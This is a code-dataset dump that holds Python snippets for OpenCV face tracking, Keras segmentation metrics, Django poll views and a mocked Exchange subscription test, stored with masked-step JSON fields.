already\n\t\t\t\t\tif megaList[i][j] >= highest and j not in assignmentList:\n\t\t\t\t\t\tindex = j\n\t\t\t\t\t\thighest = megaList[i][j]\n\t\t\t\tprobabilityList.append(highest)\n\t\t\t\tif highest > self.minRemovalScore:\n\t\t\t\t\tif i > breakPoint:\n\t\t\t\t\t\tface = self.notVisibleFaceList.pop(i-breakPoint-1)\n\t\t\t\t\t\tself.visibleFaceList.append(face)\n\t\t\t\t\t\tindex = len(self.visibleFaceList)-1\n\t\t\t\t\tassignmentList.append(index)\n\t\t\t\telse:\n\t\t\t\t\tface = Face()\n\t\t\t\t\tface.id = self.totalFaceCount\n\t\t\t\t\tself.totalFaceCount += 1\n\t\t\t\t\tself.visibleFaceList.append(face)\n\t\t\t\t\tassignmentList.append(len(self.visibleFaceList)-1)\n\n\t\t\tself.makeAssignments(assignmentList, rects)\n\t\t\tk = 0\n\t\t\twhile k < breakPoint:\n\t\t\t\tif k not in assignmentList:\n\t\t\t\t\tface = 
self.visibleFaceList.pop(k)\n\t\t\t\t\tself.notVisibleFaceList.append(face)\n\t\t\t\tk+=1\n\t\t\tl = 0\n\t\t\t# while len(assignmentList) > len(rects):\n\n\t\t\t\n\n\tdef analyzeFrame3(self,rects):\n\t\tself.pruneFaceList()\n\t\tif len(rects)>len(self.visibleFaceList):\n\t\t\tif len(self.visibleFaceList)>0:\n\t\t\t\tmegaList = self.listHelper(self.visibleFaceList,rects)\n\t\t\t\t# print megaList\n\t\t\t\tassignmentList = []\n\t\t\t\tfor i in range(len(megaList)):\n\t\t\t\t\thighest = 0\n\t\t\t\t\tindex = 0\n\t\t\t\t\tfor j in range(len(megaList[i])):\n\t\t\t\t\t\t# ensure that face hasn't been used already\n\t\t\t\t\t\tif megaList[i][j] >= highest and j not in assignmentList:\n\t\t\t\t\t\t\tindex = j\n\t\t\t\t\t\t\thighest = megaList[i][j]\n\t\t\t\t\tassignmentList.append(index)\n\n\t\t\t\tself.makeAssignments(assignmentList, rects)\n\n\t\t\t\tnotList = self.listHelper(self.notVisibleFaceList,rects)\n\n\t\t\t\tif notList != []:\n\t\t\t\t\tfor i in range(len(rects)):\n\t\t\t\t\t\tindex = -1\n\t\t\t\t\t\thighest = 0\n\t\t\t\t\t\tfor j in range(len(self.notVisibleFaceList)):\n\t\t\t\t\t\t\tif j not in assignmentList:\n\t\t\t\t\t\t\t# print notList\n\t\t\t\t\t\t\t\tif notList[i][j] > highest:\n\t\t\t\t\t\t\t\t\tindex = j\n\t\t\t\t\t\t\t\t\thighest = notList[j][i]\n\t\t\t\t\t\tif index != -1:\n\t\t\t\t\t\t\tif notList[index][i] > self.minRemovalScore:\n\t\t\t\t\t\t\t\tface = self.notVisibleFaceList.pop(index)\n\t\t\t\t\t\t\t\tface.setPosition(rects[i])\n\t\t\t\t\t\t\t\tself.visibleFaceList.append(face)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tfc = Face()\n\t\t\t\t\t\t\tfc.id = self.totalFaceCount\n\t\t\t\t\t\t\t# print fc.id\n\t\t\t\t\t\t\tself.totalFaceCount += 1\n\t\t\t\t\t\t\tfc.setPosition(rects[i])\n\t\t\t\t\t\t\tself.visibleFaceList.append(fc)\n\t\t\t\telse:\n\t\t\t\t\tfor i in range(len(rects)):\n\t\t\t\t\t\tfc = Face()\n\t\t\t\t\t\tfc.id = self.totalFaceCount\n\t\t\t\t\t\t# print fc.id\n\t\t\t\t\t\tself.totalFaceCount += 
1\n\t\t\t\t\t\tfc.setPosition(rects[i])\n\t\t\t\t\t\tself.visibleFaceList.append(fc)\n\t\t\telse:\n\t\t\t\tfor i in range(len(rects)):\n\t\t\t\t\tfc = Face()\n\t\t\t\t\tfc.id = self.totalFaceCount\n\t\t\t\t\t# print fc.id\n\t\t\t\t\tself.totalFaceCount += 1\n\t\t\t\t\tfc.setPosition(rects[i])\n\t\t\t\t\tself.visibleFaceList.append(fc)\n\n\n\t\telif len(rects)==len(self.visibleFaceList):\n\t\t\tmegaList = self.listHelper(self.visibleFaceList,rects)\n\t\t\t# print megaList\n\t\t\tassignmentList = []\n\t\t\tfor i in range(len(megaList)):\n\t\t\t\thighest = 0\n\t\t\t\tindex = 0\n\t\t\t\tfor j in range(len(megaList[i])):\n\t\t\t\t\tif megaList[i][j] >= highest and j not in assignmentList:\n\t\t\t\t\t\tindex = j\n\t\t\t\t\t\thighest = megaList[i][j]\n\t\t\t\tassignmentList.append(index)\n\t\t\t\n\t\t\tself.makeAssignments(assignmentList, rects)\n\n\t\telse:\n\t\t\t# less rects than faces\n\t\t\tmegaList = self.listHelper(self.visibleFaceList,rects)\n\t\t\t# print megaList\n\t\t\tassignmentList = []\n\t\t\tprobabilityList = []\n\t\t\tfor i in range(len(megaList)):\n\t\t\t\thighest = 0\n\t\t\t\tindex = 0\n\t\t\t\tfor j in range(len(megaList[i])):\n\t\t\t\t\tif megaList[i][j] >= highest and j not in assignmentList:\n\t\t\t\t\t\tindex = j\n\t\t\t\t\t\thighest = megaList[i][j]\n\t\t\t\tassignmentList.append(index)\n\t\t\t\tprobabilityList.append(highest)\n\n\t\t\tif len(probabilityList)!=0:\n\t\t\t\tlowIndex = probabilityList.index(min(probabilityList))\n\t\t\t\tself.notVisibleFaceList.append(self.visibleFaceList.pop(lowIndex))\n\t\t\t\tassignmentList.pop(lowIndex)\n\t\t\t\tself.makeAssignments(assignmentList, rects)\n\n\n\n\n\tdef makeAssignments(self, assignmentList, rects, indices, visibleFaces):\n\t\t# print \"assign\"\n\t\t# print assignmentList\n\t\t# print rects\n\t\tcounter = 0\n\t\t# print len(self.visibleFaceList)\n\t\tfor i in range(len(assignmentList)):\n\t\t\tif rects != []:\n\t\t\t\tif assignmentList[i] != -1:\n\t\t\t\t\tif i < 
visibleFaces:\n\t\t\t\t\t\tself.visibleFaceList[i].setPosition(rects[assignmentList[i]])\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint \"HERE\"\n\t\t\t\t\t\tprint assignmentList\n\t\t\t\t\t\tprint rects\n\t\t\t\t\t\tprint assignmentList[indices[counter]]\n\t\t\t\t\t\tprint rects[assignmentList[indices[counter]]]\n\t\t\t\t\t\tself.visibleFaceList[counter+visibleFaces].setPosition(rects[assignmentList[indices[counter]]])\n\t\t\t\t\t\tcounter += 1\n\n\n\tdef scoreForBeingHere(self, face1, rect):\n\t\t\"\"\"compares face and rect to sees what the chances are that they are the same\n\t\treturns float between 0 and 1\"\"\"\n\t\ttime = dt.datetime.now()\n\t\trecentPosition = face1.getPosition()\n\t\tif not (recentPosition==[]):\n\t\t\tdeltaTime = (time - recentPosition[2]).total_seconds()\n\t\t\tvelocity = face1.getVelocity()\n\t\t\tarea = math.pow(face1.getArea(),0.5)\n\t\t\tif self.usingTime:\n\t\t\t\tradius = deltaTime*area*self.radiusSize\n\t\t\telse:\n\t\t\t\tradius = area*self.radiusSize\n\t\t\tmiddleOfRect = ((rect[2]+rect[0])/2,(rect[3]+rect[1])/2)\n\t\t\tmiddleOfFace = ((recentPosition[1][0]+recentPosition[0][0])/2,(recentPosition[1][1]+recentPosition[0][1])/2)\n\t\t\tif velocity != 0:\n\t\t\t\tmiddleOfFace = (middleOfFace[0] + velocity[0]/velocity[2]*deltaTime*self.velocityWeight, middleOfFace[1] + velocity[1]/velocity[2]*deltaTime*self.velocityWeight)\n\t\t\tdiffMiddles = math.pow(math.pow(middleOfFace[0]-middleOfRect[0], 2) + math.pow(middleOfFace[1]-middleOfRect[1], 2), 0.5)\n\t\t\t\n\n\t\t\t# asymptote equation such that after the difference in middles is more than 1 radius away,\n\t\t\t# prob will be down to 0.25 but after that it slowly goes to 0 never quite reaching it\n\t\t\tx = math.pow(diffMiddles/radius,3)\n\t\t\t# decays with increase in time\n\t\t\tif self.usingTime:\n\t\t\t\tscore = self.scoreWeight/(deltaTime*(3*x+1))\n\t\t\telse:\n\t\t\t\tscore = self.scoreWeight/((3*x+1))\n\t\t\treturn score\n\t\telse:\n\t\t\treturn 0\n\n\n\tdef 
readFrame(self):\n\t\t\"\"\"read frame from openCV info\"\"\"\n\t\tsuccess, self.frameImage = self.vidcap.read()\n\t\treturn success, self.frameImage\n\n\n\tdef detectAll(self):\n\t\t\"\"\"Run face detection algorithm on the whole picture and make adjustments \n\t\tto the faces based on where the are and where they should be\"\"\"\n\t\trects = self.cascade.detectMultiScale(self.frameImage, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))\n\t\treturn rects\n\n\n\t# # won't really ever use\n\t# def estimateAll(self):\n\t# \t\"\"\"Step forward one frame, update all (visible?) faces based on estimation \n\t# \tfrom velocities; don't run face detection algorithm\n\t# \tShould be run every frame except where detectAll() is run.\"\"\"\n\t# \tpass\n\t# \t# for face in self.visibleFaceList[]:\n\t# \t# \tface.estimateNextPosition()\n\n\n\tdef findFaces(self):\n\t\t\"\"\"detects all faces with the frame then analyzes the frame to determine\n\t\twhich face belongs to which face object\"\"\"\n\t\trects = self.detectAll()\n\t\tif len(rects)==0:\n\t\t\trects = []\n\t\telse:\n\t\t\trects[:, 2:] += rects[:, :2]\n\t\tself.analyzeFrame(rects)\n\n\n\tdef display(self):\n\t\t\"\"\" Displays current frame with rectangles and boxes\"\"\"\n\t\t# print len(self.visibleFaceList)\n\t\t# print \"not visible: \"\n\t\t# for face in self.notVisibleFaceList:\n\t\t# \tprint face.id\n\t\t# print \"visibel: \"\n\t\tfor i in range(len(self.visibleFaceList)):\n\t\t\t# print self.visibleFaceList[i].id\n\t\t\tself.showRectangle(self.visibleFaceList[i].getPosition(),self.visibleFaceList[i].id)\n\t\tcv2.imshow(\"show\", self.frameImage)\n\n\tdef clean(self):\n\t\ti = 0\n\t\twhile i < len(self.notVisibleFaceList):\n\t\t\tif len(self.notVisibleFaceList[i].prevPositions) < self.cleanThresh:\n\t\t\t\tself.notVisibleFaceList.pop(i)\n\t\t\t\tself.totalFaceCount -= 1\n\t\t\ti += 1\n\n\n\tdef showRectangle(self, pos, IDnum):\n\t\tcv2.rectangle(self.frameImage, pos[0], pos[1], (255,0,0), 
2)\n\t\tcv2.putText(self.frameImage, str(IDnum), pos[0], cv2.FONT_HERSHEY_SIMPLEX, 2, [0,255,0], 3)\n\t\t\n\n\tdef endWindow(self):\n\t\t\"\"\"stops using webcam (or whatever source is) and removes display window\"\"\"\n\t\tself.vidcap.release()\n\t\tcv2.destroyWindow(\"show\")",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
def false_pos(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pos = K.round(K.clip(y_true, 0, 1))
y_neg = 1 - y_pos
fp = K.sum(y_neg * y_pred_pos)
fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)
return fp_ratio
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def dice_coef(y_true, y_pred):
smooth = 1.0
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
union = K.sum(y_true_f) + K.sum(y_pred_f)
return (2.0 * intersection + smooth) / (union + smooth)
def true_pos(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pos = K.round(K.clip(y_true, 0, 1))
tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)
return tp
<|reserved_special_token_0|>
def false_pos(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pos = K.round(K.clip(y_true, 0, 1))
y_neg = 1 - y_pos
fp = K.sum(y_neg * y_pred_pos)
fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)
return fp_ratio
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def dice_coef(y_true, y_pred):
smooth = 1.0
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
union = K.sum(y_true_f) + K.sum(y_pred_f)
return (2.0 * intersection + smooth) / (union + smooth)
def true_pos(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pos = K.round(K.clip(y_true, 0, 1))
tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)
return tp
def true_neg(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pred_neg = 1 - y_pred_pos
y_pos = K.round(K.clip(y_true, 0, 1))
y_neg = 1 - y_pos
tn = K.sum(y_neg * y_pred_neg)
tn_ratio = (tn + smooth) / (K.sum(y_neg) + smooth)
return tn_ratio
def false_pos(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pos = K.round(K.clip(y_true, 0, 1))
y_neg = 1 - y_pos
fp = K.sum(y_neg * y_pred_pos)
fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)
return fp_ratio
<|reserved_special_token_1|>
import tensorflow.keras.backend as K
def dice_coef(y_true, y_pred):
smooth = 1.0
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
union = K.sum(y_true_f) + K.sum(y_pred_f)
return (2.0 * intersection + smooth) / (union + smooth)
def true_pos(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pos = K.round(K.clip(y_true, 0, 1))
tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)
return tp
def true_neg(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pred_neg = 1 - y_pred_pos
y_pos = K.round(K.clip(y_true, 0, 1))
y_neg = 1 - y_pos
tn = K.sum(y_neg * y_pred_neg)
tn_ratio = (tn + smooth) / (K.sum(y_neg) + smooth)
return tn_ratio
def false_pos(y_true, y_pred):
smooth = 1
y_pred_pos = K.round(K.clip(y_pred, 0, 1))
y_pos = K.round(K.clip(y_true, 0, 1))
y_neg = 1 - y_pos
fp = K.sum(y_neg * y_pred_pos)
fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)
return fp_ratio
<|reserved_special_token_1|>
# Copyright (c) 2020 Hai Nguyen
#
# This software is released under the MIT License.
# https://opensource.org/licenses/MIT
import tensorflow.keras.backend as K
def dice_coef(y_true, y_pred):
    """Soft Dice coefficient between a ground-truth mask and a prediction.

    Both tensors are flattened before the overlap is computed; the +1
    smoothing term keeps the ratio defined (and equal to 1) when both
    masks are empty.
    """
    eps = 1.0
    truth = K.flatten(y_true)
    pred = K.flatten(y_pred)
    overlap = K.sum(truth * pred)
    total = K.sum(truth) + K.sum(pred)
    return (2.0 * overlap + eps) / (total + eps)
def true_pos(y_true, y_pred):
    """Smoothed true-positive ratio (recall) of a binarized prediction.

    Predictions and labels are clipped to [0, 1] and rounded to 0/1
    before counting; the +1 terms avoid division by zero.
    """
    eps = 1
    pred_pos = K.round(K.clip(y_pred, 0, 1))
    actual_pos = K.round(K.clip(y_true, 0, 1))
    return (K.sum(actual_pos * pred_pos) + eps) / (K.sum(actual_pos) + eps)
def true_neg(y_true, y_pred):
    """Smoothed true-negative ratio (specificity) of a binarized prediction.

    Both tensors are binarized via clip-then-round; negatives are the
    complement (1 - positives). The +1 terms avoid division by zero.
    """
    eps = 1
    pred_neg = 1 - K.round(K.clip(y_pred, 0, 1))
    actual_neg = 1 - K.round(K.clip(y_true, 0, 1))
    tn = K.sum(actual_neg * pred_neg)
    return (tn + eps) / (K.sum(actual_neg) + eps)
def false_pos(y_true, y_pred):
    """Smoothed false-positive ratio: share of negatives predicted positive.

    Both tensors are binarized via clip-then-round; the denominator is
    the count of actual negatives, smoothed by +1 to avoid division by
    zero.
    """
    eps = 1
    pred_pos = K.round(K.clip(y_pred, 0, 1))
    actual_neg = 1 - K.round(K.clip(y_true, 0, 1))
    fp = K.sum(actual_neg * pred_pos)
    return (fp + eps) / (K.sum(actual_neg) + eps)
|
flexible
|
{
"blob_id": "18b10a68b2707b7bfeccbd31c5d15686453b3406",
"index": 6253,
"step-1": "<mask token>\n\n\ndef false_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n fp = K.sum(y_neg * y_pred_pos)\n fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)\n return fp_ratio\n",
"step-2": "<mask token>\n\n\ndef dice_coef(y_true, y_pred):\n smooth = 1.0\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n union = K.sum(y_true_f) + K.sum(y_pred_f)\n return (2.0 * intersection + smooth) / (union + smooth)\n\n\ndef true_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)\n return tp\n\n\n<mask token>\n\n\ndef false_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n fp = K.sum(y_neg * y_pred_pos)\n fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)\n return fp_ratio\n",
"step-3": "<mask token>\n\n\ndef dice_coef(y_true, y_pred):\n smooth = 1.0\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n union = K.sum(y_true_f) + K.sum(y_pred_f)\n return (2.0 * intersection + smooth) / (union + smooth)\n\n\ndef true_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)\n return tp\n\n\ndef true_neg(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pred_neg = 1 - y_pred_pos\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n tn = K.sum(y_neg * y_pred_neg)\n tn_ratio = (tn + smooth) / (K.sum(y_neg) + smooth)\n return tn_ratio\n\n\ndef false_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n fp = K.sum(y_neg * y_pred_pos)\n fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)\n return fp_ratio\n",
"step-4": "import tensorflow.keras.backend as K\n\n\ndef dice_coef(y_true, y_pred):\n smooth = 1.0\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n union = K.sum(y_true_f) + K.sum(y_pred_f)\n return (2.0 * intersection + smooth) / (union + smooth)\n\n\ndef true_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth)\n return tp\n\n\ndef true_neg(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pred_neg = 1 - y_pred_pos\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n tn = K.sum(y_neg * y_pred_neg)\n tn_ratio = (tn + smooth) / (K.sum(y_neg) + smooth)\n return tn_ratio\n\n\ndef false_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n fp = K.sum(y_neg * y_pred_pos)\n fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)\n return fp_ratio\n",
"step-5": "# Copyright (c) 2020 Hai Nguyen\n# \n# This software is released under the MIT License.\n# https://opensource.org/licenses/MIT\n\nimport tensorflow.keras.backend as K\n\n\ndef dice_coef(y_true, y_pred):\n smooth = 1.\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n union = K.sum(y_true_f) + K.sum(y_pred_f)\n return (2. * intersection + smooth) / (union + smooth)\n\n\ndef true_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n tp = (K.sum(y_pos * y_pred_pos) + smooth) / (K.sum(y_pos) + smooth) \n return tp \n\n\ndef true_neg(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pred_neg = 1 - y_pred_pos\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n tn = K.sum(y_neg * y_pred_neg)\n tn_ratio = (tn + smooth) / (K.sum(y_neg) + smooth)\n return tn_ratio\n\n\ndef false_pos(y_true, y_pred):\n smooth = 1\n y_pred_pos = K.round(K.clip(y_pred, 0, 1))\n y_pos = K.round(K.clip(y_true, 0, 1))\n y_neg = 1 - y_pos\n fp = K.sum(y_neg * y_pred_pos)\n fp_ratio = (fp + smooth) / (K.sum(y_neg) + smooth)\n return fp_ratio\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
from django.shortcuts import render
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response
from polls.models import Poll
from .serializers import PollSerializer
# class PollView(APIView):
#
# def get(self, request):
# serializer = PollSerializer(Poll.objects.all(), many=True)
# response = {"polls": serializer.data}
# return Response(response, status=status.HTTP_200_OK)
#
# def post(self, request, format=None):
# data = request.data
# serializer = PollSerializer(data=data)
# if serializer.is_valid():
# poll = Poll(**data)
# poll.save()
# response = serializer.data
# return Response(response, status=status.HTTP_200_OK)
#
#
def index(request):
    """Render the polls landing page with an empty template context."""
    context = {}
    return render(request, "polls/index.html", context)
#
# def show(request):
# data = {}
# p = Poll.objects.all()
# data["polls"] = p
# return render(request, "polls/show.html", data)
def show(request):
    """Render the poll list page.

    No context is passed; the template fetches its poll data itself.
    """
    return render(request, "polls/show.html")
def searchShow(request):
    """Render the poll list filtered by the ``search`` query parameter.

    Bug fix: the original returned None (a Django server error:
    "didn't return an HttpResponse") whenever the request carried no
    ``search`` parameter. An absent parameter now falls back to the
    empty string so the page always renders.
    """
    search_string = request.GET.get("search", "")
    context = {
        "search_string": search_string,
    }
    return render(request, "polls/show.html", context)
|
normal
|
{
"blob_id": "866ff68744a16158b7917ca6defc35440208ae71",
"index": 8575,
"step-1": "<mask token>\n\n\ndef index(request):\n data = {}\n return render(request, 'polls/index.html', data)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef index(request):\n data = {}\n return render(request, 'polls/index.html', data)\n\n\n<mask token>\n\n\ndef searchShow(request):\n if 'search' in request.GET:\n search_string = request.GET['search']\n context = {'search_string': search_string}\n return render(request, 'polls/show.html', context)\n",
"step-3": "<mask token>\n\n\ndef index(request):\n data = {}\n return render(request, 'polls/index.html', data)\n\n\ndef show(request):\n return render(request, 'polls/show.html')\n\n\ndef searchShow(request):\n if 'search' in request.GET:\n search_string = request.GET['search']\n context = {'search_string': search_string}\n return render(request, 'polls/show.html', context)\n",
"step-4": "from django.shortcuts import render\nfrom rest_framework import status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom polls.models import Poll\nfrom .serializers import PollSerializer\n\n\ndef index(request):\n data = {}\n return render(request, 'polls/index.html', data)\n\n\ndef show(request):\n return render(request, 'polls/show.html')\n\n\ndef searchShow(request):\n if 'search' in request.GET:\n search_string = request.GET['search']\n context = {'search_string': search_string}\n return render(request, 'polls/show.html', context)\n",
"step-5": "from django.shortcuts import render\n\nfrom rest_framework import status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\n\nfrom polls.models import Poll\nfrom .serializers import PollSerializer\n\n\n# class PollView(APIView):\n#\n# def get(self, request):\n# serializer = PollSerializer(Poll.objects.all(), many=True)\n# response = {\"polls\": serializer.data}\n# return Response(response, status=status.HTTP_200_OK)\n#\n# def post(self, request, format=None):\n# data = request.data\n# serializer = PollSerializer(data=data)\n# if serializer.is_valid():\n# poll = Poll(**data)\n# poll.save()\n# response = serializer.data\n# return Response(response, status=status.HTTP_200_OK)\n#\n#\ndef index(request):\n data = {}\n return render(request,\"polls/index.html\",data)\n#\n# def show(request):\n# data = {}\n# p = Poll.objects.all()\n# data[\"polls\"] = p\n# return render(request, \"polls/show.html\", data)\n\ndef show(request):\n # data = {}\n # p = Poll.objects.all()\n # data[\"polls\"] = p\n return render(request, \"polls/show.html\")\n\n\n\ndef searchShow(request):\n if 'search' in request.GET:\n search_string = request.GET['search']\n context = {\n \"search_string\": search_string,\n }\n return render(request, \"polls/show.html\", context)",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import pytest
from django.utils.crypto import get_random_string
from django.utils.timezone import now
from respa_exchange import listener
from respa_exchange.ews.xml import M, NAMESPACES, T
from respa_exchange.models import ExchangeResource
from respa_exchange.tests.session import SoapSeller
class SubscriptionHandler(object):
    """
    SoapSeller handler faking the EWS streaming-subscription endpoint.

    Hands out random subscription ids on Subscribe, answers
    GetStreamingEvents with a single synthetic NewMailEvent, and
    forgets the id on Unsubscribe. Each handler bails out (returns
    None) when the request is not the operation it serves.
    """

    def __init__(self, resource):
        self.resource = resource
        # subscription id -> resource, so Unsubscribe can validate ids
        self.subscription_to_resource = {}

    def handle_subscribe(self, request):
        """Answer a StreamingSubscriptionRequest for our resource's mailbox."""
        if not request.xpath('//m:StreamingSubscriptionRequest', namespaces=NAMESPACES):  # pragma: no cover
            return
        emails = request.xpath('//t:EmailAddress', namespaces=NAMESPACES)
        assert len(emails) == 1
        assert emails[0].text == self.resource.principal_email
        sub_id = get_random_string(10)
        self.subscription_to_resource[sub_id] = self.resource
        message = M.SubscribeResponseMessage(
            M.ResponseCode('NoError'),
            M.SubscriptionId(sub_id),
            ResponseClass='Success',
        )
        return M.SubscribeResponse(M.ResponseMessages(message))

    def _generate_event(self, type):
        """Build a minimal streaming event element of the given tag name."""
        item_id = T.ItemId(
            Id=get_random_string(),
            ChangeKey=get_random_string(),
        )
        folder_id = T.ParentFolderId(
            Id=get_random_string(),
            ChangeKey=get_random_string(),
        )
        return getattr(T, type)(
            T.TimeStamp(now().isoformat()),
            item_id,
            folder_id,
        )

    def handle_get_events(self, request):
        """Answer GetStreamingEvents with one fake NewMailEvent."""
        if not request.xpath('//m:GetStreamingEvents', namespaces=NAMESPACES):  # pragma: no cover
            return
        sub_id = request.xpath('//t:SubscriptionId', namespaces=NAMESPACES)[0].text
        # A real server would long-poll here; the fake answers immediately.
        notification = M.Notification(
            T.SubscriptionId(sub_id),
            self._generate_event('NewMailEvent'),
        )
        return M.GetStreamingEventsResponse(
            M.ResponseMessages(
                M.GetStreamingEventsResponseMessage(
                    M.ResponseCode('NoError'),
                    M.Notifications(notification),
                    ResponseClass='Success',
                ),
            ),
        )

    def handle_unsubscribe(self, request):
        """Answer Unsubscribe, dropping the subscription id it names."""
        if not request.xpath('//m:Unsubscribe', namespaces=NAMESPACES):  # pragma: no cover
            return
        sub_id = request.xpath('//m:SubscriptionId', namespaces=NAMESPACES)[0].text
        self.subscription_to_resource.pop(sub_id)
        return M.UnsubscribeResponse(
            M.ResponseMessages(
                M.UnsubscribeResponseMessage(
                    M.ResponseCode('NoError'),
                    ResponseClass='Success',
                ),
            ),
        )
@pytest.mark.django_db
def test_listener(settings, space_resource, exchange, monkeypatch):
email = '%s@example.com' % get_random_string()
ex_resource = ExchangeResource.objects.create(
resource=space_resource,
principal_email=email,
exchange=exchange,
sync_to_respa=True,
)
assert ex_resource.reservations.count() == 0
delegate = SubscriptionHandler(ex_resource)
SoapSeller.wire(settings, delegate)
notification_listener = listener.NotificationListener()
synced_resources = [] # Keep track of the resources we get sync-request events for
def sync_resource(resource): # Our pretend sync handler
synced_resources.append(resource)
# Ask the listener to stop after we get a resource,
# so this test actually ends someday:
notification_listener.stop()
monkeypatch.setattr(listener, 'sync_from_exchange', sync_resource)
notification_listener.start()
# ... so when `sync_resource` is called, this'll eventually happen:
assert ex_resource in synced_resources
|
normal
|
{
"blob_id": "e4bfa0a55fe0dbb547bc5f65554ef96be654ec7a",
"index": 2176,
"step-1": "<mask token>\n\n\nclass SubscriptionHandler(object):\n <mask token>\n <mask token>\n\n def handle_subscribe(self, request):\n if not request.xpath('//m:StreamingSubscriptionRequest', namespaces\n =NAMESPACES):\n return\n emails = request.xpath('//t:EmailAddress', namespaces=NAMESPACES)\n assert len(emails) == 1\n assert emails[0].text == self.resource.principal_email\n subscription_id = get_random_string(10)\n self.subscription_to_resource[subscription_id] = self.resource\n return M.SubscribeResponse(M.ResponseMessages(M.\n SubscribeResponseMessage(M.ResponseCode('NoError'), M.\n SubscriptionId(subscription_id), ResponseClass='Success')))\n <mask token>\n\n def handle_get_events(self, request):\n if not request.xpath('//m:GetStreamingEvents', namespaces=NAMESPACES):\n return\n sub_id = request.xpath('//t:SubscriptionId', namespaces=NAMESPACES)[0\n ].text\n return M.GetStreamingEventsResponse(M.ResponseMessages(M.\n GetStreamingEventsResponseMessage(M.ResponseCode('NoError'), M.\n Notifications(M.Notification(T.SubscriptionId(sub_id), self.\n _generate_event('NewMailEvent'))), ResponseClass='Success')))\n\n def handle_unsubscribe(self, request):\n if not 